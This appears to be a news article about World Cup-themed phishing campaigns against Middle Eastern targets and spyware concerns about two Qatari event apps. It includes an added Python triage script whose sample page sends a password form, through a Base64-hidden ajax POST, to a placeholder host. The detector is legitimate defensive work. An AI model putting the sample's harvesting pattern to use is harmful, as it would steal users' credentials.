World Cup phishing emails spike in Middle Eastern countries

That's where the money is

Phishing attempts targeting victims in the Middle East increased 100 percent last month in the lead up to the World Cup in Qatar, according to security shop Trellix.

Its researchers documented a spike in these email-based attacks between September and October, when the volume of malicious emails doubled. Miscreants used FIFA and other football-related lures as the initial attack vector, and the security researchers detailed several email samples they found in the wild. 

In one, the email purported to be from the FIFA transfer matching system (TMS) helpdesk and included a fake alert that the user's two-factor authentication had been deactivated. It then directed the user to an attacker-controlled website, which allows the crooks to steal the user's credentials.

Another scam email impersonated David Firisua, the team manager for Auckland City FC, and requested confirmation of a FIFA payment, while yet another phish impersonated the FIFA ticketing office and tried to trick a victim into "urgently resolving" a payment issue by clicking on a malicious HTML attachment.

Trellix's phishing net also caught emails spoofing Snoonu, the official food delivery partner of the World Cup, that offered fake free match tickets and contained a malicious xlsm attachment.

"It is a common practice for attackers to utilize the important/popular events as a part of the social engineering tactics and particularly target the organizations which are related to events and more promising victims for the attack," the researchers warned.

Trellix also highlighted World Cup-themed phishing pages that look like the legitimate FIFA pages they spoof, and warned that miscreants are using "multiple phishing kits where the post URL is either obfuscated, Base64 encoded or present in the ajax request instead of form action tags."
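
The two concrete patterns in that warning, a credential form with no usable action attribute and a POST destination hidden as Base64 or placed in an ajax call, can be checked for when triaging a reported page or HTML attachment. The sketch below is an added example, not Trellix's tooling; the sample markup and the collect.example host are constructed, and it does not attempt to undo other kinds of obfuscation. Legitimate single-page apps also submit logins from script, so a hit is a reason to look closer, not a verdict.

```python
import base64, binascii, re
from html.parser import HTMLParser

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # candidate Base64 runs
AJAX_RE = re.compile(r"\$\.(?:ajax|post)\s*\(|\bfetch\s*\(|XMLHttpRequest")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)

class FormScan(HTMLParser):
    """Records every form's action value and whether a password input exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append((a.get("action") or "").strip())
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def decoded_urls(text):
    """Return Base64 runs in text that decode to an http(s) URL."""
    urls = []
    for run in B64_RE.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue                                 # not valid Base64
        if raw.startswith((b"http://", b"https://")):
            urls.append(raw.decode("ascii", "replace"))
    return urls

def triage(html):
    p = FormScan()
    p.feed(html)
    js = "\n".join(SCRIPT_RE.findall(html))          # inline script bodies only
    real = [a for a in p.actions
            if a not in ("", "#") and not a.lower().startswith("javascript:")]
    flags = []
    if p.has_password and not real:
        flags.append("password field with no form action")
    if AJAX_RE.search(js):
        flags.append("ajax call in inline script")
    return flags + ["base64 url: " + u for u in decoded_urls(js)]

# Constructed samples; collect.example is a placeholder host.
ENC = base64.b64encode(b"https://collect.example/post.php").decode()
PHISH = ('<form id="f"><input name="u"><input type="password" name="p"></form>'
         '<script>var d = atob("' + ENC + '");'
         '$.ajax({type: "POST", url: d, data: $("#f").serialize()});</script>')
BENIGN = '<form action="/login" method="post"><input type="password" name="p"></form>'
```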

Additionally, the top five malware families being used to target Middle Eastern countries are Qakbot (40 percent), Emotet (26 percent), Formbook (26 percent), Remcos (4 percent) and QuadAgent (4 percent), according to the security researchers.

And in a separate document [PDF], Trellix listed malicious URLs, binaries and email addresses used in these recent World Cup-themed campaigns.

Trellix expects these phishing attacks to continue through January 2023, and noted that organizations directly related to the football tournament should remain "extra-vigilant." 

Phished, snooped, or jailed?

Of course, the nearly 3 million people who bought tickets to attend a match in Qatar have a whole other set of cybersecurity threats to worry about once they are in the country — in addition to a litany of moral and ethical concerns related to attending the World Cup in a country with a horrible human rights record that built its stadiums using migrant workers whose treatment has been described as "modern slavery."

Two World Cup apps have come under increased scrutiny from security researchers and various countries' data protection agencies, which have labeled the apps spyware and encouraged visitors to use burner phones.

The two apps are Ehteraz, a Covid-19 tracker from the Qatari Ministry of Public Health, and Hayya from the government's Supreme Committee for Delivery & Legacy overseeing the Cup locally, which allows ticket holders entry into the stadiums and access to free metro and bus transportation services.

All of which makes watching the matches from the comfort of your own couch, where you can drink a beer and kiss your partner without fear of getting arrested, sound increasingly appealing. ®
